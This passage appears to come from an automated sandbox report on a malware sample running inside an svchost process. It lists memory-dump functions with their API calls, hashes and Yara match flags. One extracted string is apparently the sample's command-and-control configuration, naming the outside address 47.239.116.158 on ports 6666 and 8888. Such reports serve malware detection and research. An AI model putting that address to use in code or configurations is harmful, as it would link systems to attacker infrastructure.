                                                                                                              • API String ID: 1823113695-4289949731
                                                                                                              • Opcode ID: 2434af0b2212db6e39b9fc10dad6f782b8a6a83c92c49570a242991fb51e5831
                                                                                                              • Instruction ID: f88ae12aab5cf6d52671eb6180e435cd67c2f89256c94ded2b98ca6ef2e6e96d
                                                                                                              • Opcode Fuzzy Hash: 2434af0b2212db6e39b9fc10dad6f782b8a6a83c92c49570a242991fb51e5831
                                                                                                              • Instruction Fuzzy Hash: 9D21C5737002105BD730DE6CEC90B5AFBE9EB91229B22096BE296CB250D661F84187A4
                                                                                                              Function 04DF8500 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF8519
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFEFEB
                                                                                                                • Part of subcall function 04DFEFD6: __CxxThrowException@8.LIBCMT ref: 04DFF000
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFF011
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF8537
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                              • String ID: invalid string position$string too long
                                                                                                              • API String ID: 963545896-4289949731
                                                                                                              • Opcode ID: 35f23af235fb6d2f63037156da9ed2091fafec2f527e517a8e1247e36ed022fc
                                                                                                              • Instruction ID: 230ed86a37cb0f69b99f2d24f1952a4d6a0d63cce5790f68266c7c6b288ac7d8
                                                                                                              • Opcode Fuzzy Hash: 35f23af235fb6d2f63037156da9ed2091fafec2f527e517a8e1247e36ed022fc
                                                                                                              • Instruction Fuzzy Hash: E42172713003069F8B24EF68EC8485973A5FF883147114A2AF616CB751EB31FA54DBA2
                                                                                                              Function 02586380 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28stringsynchronizationthreadCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,02587869,?,?,?,?,?,?,02597B00,0000000C,02587911,?), ref: 02586396
                                                                                                                • Part of subcall function 02585E30: _memset.LIBCMT ref: 02585E61
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02586110,00000000,00000000,00000000), ref: 025863BE
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,02587869,?,?,?,?,?,?,02597B00,0000000C,02587911,?), ref: 025863CC
                                                                                                              Strings
                                                                                                              • |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02586391
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateObjectSingleThreadWait_memsetlstrlen
                                                                                                              • String ID: |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                                                                                              • API String ID: 2656291350-42098077
                                                                                                              • Opcode ID: 877c06e7c430fbccbdf6a6b51fcb3a3e330db0518b010dd656225186e1f89bb4
                                                                                                              • Instruction ID: c0188b4bd0c749017481832c3e4b69435302181e32cecddbaba8ea90548ba735
                                                                                                              • Opcode Fuzzy Hash: 877c06e7c430fbccbdf6a6b51fcb3a3e330db0518b010dd656225186e1f89bb4
                                                                                                              • Instruction Fuzzy Hash: A8F065309D5304EAEB207F54AD0AF283768B700B11F914911F314FA1C0EBF46474961D
                                                                                                              Function 02A094FF Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3556499859-0
                                                                                                              • Opcode ID: 0bdfae7caacf7fadaa519cb4cc608f3d6f4d07e01262948322c351cd334035d8
                                                                                                              • Instruction ID: 49b02a9149cbd402968a90a28866de49811e28ad9cf0fd1b4a4bba2cc54faf88
                                                                                                              • Opcode Fuzzy Hash: 0bdfae7caacf7fadaa519cb4cc608f3d6f4d07e01262948322c351cd334035d8
                                                                                                              • Instruction Fuzzy Hash: 5A316131840A31EFE721AF759DC870A7EA6EB48765B188516E805CB2B0FF31D481CF50
                                                                                                              Function 04C83A21 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3556499859-0
                                                                                                              • Opcode ID: 9e98d67c59dfef5c1616e1a423f3ae33231e8822f93de90274e6364e42df18fa
                                                                                                              • Instruction ID: ed0473c1f4766e7634d5798f8d02ba7605c97218610b1286dd14719c4e849786
                                                                                                              • Opcode Fuzzy Hash: 9e98d67c59dfef5c1616e1a423f3ae33231e8822f93de90274e6364e42df18fa
                                                                                                              • Instruction Fuzzy Hash: 21319E719017709FFB12FFB58C98A267FA5EB44B64B10952AFC109B1B1EB31A041EF40
                                                                                                              Function 0258E515 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0258E549
                                                                                                              • __isleadbyte_l.LIBCMT ref: 0258E57C
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0258E5AD
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0258E61B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058430110-0
                                                                                                              • Opcode ID: 27e1653706bb2c0c18b92a44b19bb85f915c4f50e2361729c966964622be8fa3
                                                                                                              • Instruction ID: 7f7bbf5fcd896d2c289a8827c9450ad6ed3b98bf2d8fb99047d6c0ded032a2be
                                                                                                              • Opcode Fuzzy Hash: 27e1653706bb2c0c18b92a44b19bb85f915c4f50e2361729c966964622be8fa3
                                                                                                              • Instruction Fuzzy Hash: B531D271A04256EFDB20EF64D882ABD3FF1BF02214F148569F065AB191E7B0DD50DB58
                                                                                                              Function 04E0A612 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 04E0A646
                                                                                                              • __isleadbyte_l.LIBCMT ref: 04E0A679
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 04E0A6AA
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 04E0A718
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058430110-0
                                                                                                              • Opcode ID: ec7c1bb397f8d3298b5bf60dcb17f6f9454367f7123a65921b450734af83b63f
                                                                                                              • Instruction ID: 2a52ade9dfdc0e56706cc03d3d7df4ff9920f1a64fa9004a8b278d2c647b2d19
                                                                                                              • Opcode Fuzzy Hash: ec7c1bb397f8d3298b5bf60dcb17f6f9454367f7123a65921b450734af83b63f
                                                                                                              • Instruction Fuzzy Hash: D8318D7160034AEFDB20DF64E8909AA3BB5BF11318B15D979E4A19B1D0E331E981DB50
                                                                                                              Function 02584370 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 025843DC
                                                                                                                • Part of subcall function 025813A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 025813CB
                                                                                                                • Part of subcall function 025841D0: EnterCriticalSection.KERNEL32(02584F95,02584E35,025842AE,00000000,?,?,02584E35,?,?,?,?,00000000,000000FF), ref: 025841D8
                                                                                                                • Part of subcall function 025841D0: LeaveCriticalSection.KERNEL32(02584F95,?,?,?,00000000,000000FF), ref: 025841E6
                                                                                                                • Part of subcall function 02584C50: HeapFree.KERNEL32(?,00000000,?,00000000,02584E35,?,025842B8,02584E35,00000000,?,?,02584E35,?), ref: 02584C77
                                                                                                              • SetLastError.KERNEL32(00000000,?), ref: 025843C7
                                                                                                              • SetLastError.KERNEL32(00000057), ref: 025843F1
                                                                                                              • WSAGetLastError.WS2_32(?), ref: 02584400
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 2060118545-0
                                                                                                              • Opcode ID: 1a906e03da93dcb6f658d52892987dbc060a85087de2808677c18e30b69fa353
                                                                                                              • Instruction ID: d8d2b072c9cf246bfbe06026858ea04bc1d6c0a364f0982fa412b6ef2b90572a
                                                                                                              • Opcode Fuzzy Hash: 1a906e03da93dcb6f658d52892987dbc060a85087de2808677c18e30b69fa353
                                                                                                              • Instruction Fuzzy Hash: FF110A32E055199B8B10FE79F8846EEB7A8FFC4322B0545A6ED0CE7200EB75892546D4
                                                                                                              Function 04DFDEC0 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 04DFDEE3
                                                                                                              • _free.LIBCMT ref: 04DFDF25
                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,04DFDCE5), ref: 04DFDF4C
                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04DFDF53
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Heap_free$FreeProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1072109031-0
                                                                                                              • Opcode ID: 0c270e80192cc9f8f93e573d70667088b7c4551d287f1167a6150f6ad53e30ad
                                                                                                              • Instruction ID: 2e9997d50e4e21f4797690d17f281859af43f0e682af0a99d11237060573ab93
                                                                                                              • Opcode Fuzzy Hash: 0c270e80192cc9f8f93e573d70667088b7c4551d287f1167a6150f6ad53e30ad
                                                                                                              • Instruction Fuzzy Hash: AA117971600700ABE630DB65CC44F53B3AAFF88701F15891DE68A87A80D774F842CB61
                                                                                                              Function 02583BD0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WSAEventSelect.WS2_32(?,02583A9B,00000023), ref: 02583BE2
                                                                                                              • WSAGetLastError.WS2_32 ref: 02583BED
                                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 02583C38
                                                                                                              • WSAGetLastError.WS2_32 ref: 02583C43
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EventSelectsend
                                                                                                              • String ID:
                                                                                                              • API String ID: 259408233-0
                                                                                                              • Opcode ID: e6fb258cab0387814e21923ed2b9650c650481cf283a074a559bed23e41891c0
                                                                                                              • Instruction ID: 09fa5b1eabdfca3190164edb2e2afcb28f8ccebdc6eea2a30480ae1283550caa
                                                                                                              • Opcode Fuzzy Hash: e6fb258cab0387814e21923ed2b9650c650481cf283a074a559bed23e41891c0
                                                                                                              • Instruction Fuzzy Hash: CE1191B1600700ABD320AF79D8C8A47BAE9FF88710F410A2DE697C3640D771E4509F54
                                                                                                              Function 02A0EE1E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction ID: 837f9228f86254237e7433bfa941fae3089971f5e4aa4bd927c8726f18264ad3
                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction Fuzzy Hash: F311487604018EBBCF165F84EE818EE3F63BB08358B488815FA6859070DB36D5B1BF81
                                                                                                              Function 04C8B7FA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction ID: 899cb695bb8674dcefb73dc74920c477b65c34fca0427e0934cac5ea08e5187e
                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction Fuzzy Hash: 67114E7200014EFBCF266E85CC55CEE3F27BB19358B588459FA1859130E636EAB1AB81
                                                                                                              Function 0258F451 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction ID: 174ad9a973727f7639ea756733d0fb1c3ac709779024c97be1b6c53a0bdf1b46
                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction Fuzzy Hash: 5D11393240014ABBCF126E84DC418EE3F62BB5C258B898416FA1869831D777C9B2AB95
                                                                                                              Function 04E0BE3B Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction ID: c0ca3f5dab26f579fcf6a35af3cc0a75b82671d59e50e3135f2809e2d402e3e5
                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                              • Instruction Fuzzy Hash: 2E11393240014EBFCF265FC4CC42CEE3F66BB18358B499855FA2859170D736E9B2AB91
                                                                                                              Function 02A0D47B Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 02A0D487
                                                                                                                • Part of subcall function 02A09348: __getptd_noexit.LIBCMT ref: 02A0934B
                                                                                                                • Part of subcall function 02A09348: __amsg_exit.LIBCMT ref: 02A09358
                                                                                                              • __amsg_exit.LIBCMT ref: 02A0D4A7
                                                                                                              • __lock.LIBCMT ref: 02A0D4B7
                                                                                                              • _free.LIBCMT ref: 02A0D4E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170801528-0
                                                                                                              • Opcode ID: fc152d664be9bacc00192f14bb79ddadcf9c02b7d24845c1b46f6ff2f6b87a72
                                                                                                              • Instruction ID: cf332bb4f1cdd16e34150476e2bbcae2b447cf1eb2a3e8ebe212828618921f9e
                                                                                                              • Opcode Fuzzy Hash: fc152d664be9bacc00192f14bb79ddadcf9c02b7d24845c1b46f6ff2f6b87a72
                                                                                                              • Instruction Fuzzy Hash: 82012D32A41A21ABD725AFA8BAC479DB7A1EF04B24F058005E8116B2D0CF35B581CFD6
                                                                                                              Function 04C84294 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 04C842A0
                                                                                                                • Part of subcall function 04C8386A: __getptd_noexit.LIBCMT ref: 04C8386D
                                                                                                                • Part of subcall function 04C8386A: __amsg_exit.LIBCMT ref: 04C8387A
                                                                                                              • __amsg_exit.LIBCMT ref: 04C842C0
                                                                                                              • __lock.LIBCMT ref: 04C842D0
                                                                                                              • _free.LIBCMT ref: 04C84300
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170801528-0
                                                                                                              • Opcode ID: 09695a788960c7b79bb7b2e6b7bb34a54df84041e1a98278b1a16c4ff9f0b368
                                                                                                              • Instruction ID: 160fc352134a9643ce99ae3fa85b0cc4771e06ac80c8a12f807acd87ca767025
                                                                                                              • Opcode Fuzzy Hash: 09695a788960c7b79bb7b2e6b7bb34a54df84041e1a98278b1a16c4ff9f0b368
                                                                                                              • Instruction Fuzzy Hash: E201C431D01B32EBE724FF64884875973A2BF01B29F54010DE800A3290DB387A82EBD9
                                                                                                              Function 025841D0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(02584F95,02584E35,025842AE,00000000,?,?,02584E35,?,?,?,?,00000000,000000FF), ref: 025841D8
                                                                                                              • LeaveCriticalSection.KERNEL32(02584F95,?,?,?,00000000,000000FF), ref: 025841E6
                                                                                                              • LeaveCriticalSection.KERNEL32(02584F95), ref: 02584247
                                                                                                              • SetEvent.KERNEL32(8520468B), ref: 02584262
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$Leave$EnterEvent
                                                                                                              • String ID:
                                                                                                              • API String ID: 3394196147-0
                                                                                                              • Opcode ID: a2621a42711db5e91f0d45e4e53dc1978c7a44ca39761d957f209f85685544df
                                                                                                              • Instruction ID: 9aecfb4207d2f3e2b837428f6b39a510a09db052866cb4ed9341bc4411a7748e
                                                                                                              • Opcode Fuzzy Hash: a2621a42711db5e91f0d45e4e53dc1978c7a44ca39761d957f209f85685544df
                                                                                                              • Instruction Fuzzy Hash: D81103B0A05B019FD725DF74C584AA6BBE9BF48301F95892DE95E97200EB30E815CB40
                                                                                                              Function 02584AE0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • timeGetTime.WINMM(00000001,?,00000001,?,02583C2F,?,?,00000001), ref: 02584AF5
                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 02584B04
                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 02584B11
                                                                                                              • timeGetTime.WINMM(?,02583C2F,?,?,00000001), ref: 02584B28
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: IncrementInterlockedTimetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 159728177-0
                                                                                                              • Opcode ID: 88b8d5d16ab20b6e1cd0fe4a00d0ac215df70516434fedafa68adf84e23972bd
                                                                                                              • Instruction ID: 6737667a5a6fa3e3bddc24c8c21a09174bea6dc4a1b31e6aa829bb8d429a2701
                                                                                                              • Opcode Fuzzy Hash: 88b8d5d16ab20b6e1cd0fe4a00d0ac215df70516434fedafa68adf84e23972bd
                                                                                                              • Instruction Fuzzy Hash: D601C8B1A007059FCB21EF6AD88095AFBE9BF98750741892AE549C7600E7B4E6448FA4
                                                                                                              Function 02583640 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02583647
                                                                                                              • _free.LIBCMT ref: 0258367C
                                                                                                                • Part of subcall function 02586F29: RtlFreeHeap.NTDLL(00000000,00000000,?,0258996C,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586F3F
                                                                                                                • Part of subcall function 02586F29: GetLastError.KERNEL32(00000000,?,0258996C,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000), ref: 02586F51
                                                                                                              • _malloc.LIBCMT ref: 025836B7
                                                                                                              • _memset.LIBCMT ref: 025836C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3340475617-0
                                                                                                              • Opcode ID: ecaae943c04311dbdbe7cbe452bb904950fb0d9f5f4ef6829c14dde2d371b7b0
                                                                                                              • Instruction ID: 2e9e566fe48802f4212de1fc2bd69b0b1f2eef7bb69b23ffb904db38eddc43a3
                                                                                                              • Opcode Fuzzy Hash: ecaae943c04311dbdbe7cbe452bb904950fb0d9f5f4ef6829c14dde2d371b7b0
                                                                                                              • Instruction Fuzzy Hash: 3801C8B1900B059FE3209F7AD885B97BAE9FB85314F10482EE5AE97301D670A8048F64
                                                                                                              Function 04DF3660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 04DF3667
                                                                                                              • _free.LIBCMT ref: 04DF369C
                                                                                                                • Part of subcall function 04DFF689: RtlFreeHeap.NTDLL(00000000,00000000,?,04E03E9C,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04DFF69F
                                                                                                                • Part of subcall function 04DFF689: GetLastError.KERNEL32(00000000,?,04E03E9C,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000), ref: 04DFF6B1
                                                                                                              • _malloc.LIBCMT ref: 04DF36D7
                                                                                                              • _memset.LIBCMT ref: 04DF36E5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                              • String ID:
